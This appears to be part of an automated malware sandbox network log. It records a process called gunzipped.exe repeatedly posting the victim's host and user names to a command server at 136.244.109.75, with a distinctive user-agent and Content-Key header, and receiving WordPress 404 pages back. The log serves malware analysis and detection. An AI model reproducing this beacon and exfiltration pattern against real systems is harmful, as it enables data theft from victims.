                          Apr 17, 2024 03:18:29.481024981 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:29.481045008 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:29.481065035 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:29.481082916 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:29.481102943 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          64192.168.2.549778136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:29.847908020 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:30.056888103 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:31.046307087 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:29 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:31.046369076 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:31.046410084 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:31.046449900 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:31.046493053 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:31.046533108 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:31.046574116 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:31.046611071 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:31.046648979 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:31.046689034 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          65192.168.2.549779136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:31.393354893 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:31.596919060 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:32.588561058 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:31 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:32.588629007 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:32.588668108 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:32.588706970 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:32.588748932 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:32.588788033 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:32.588828087 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:32.588869095 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:32.588907957 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
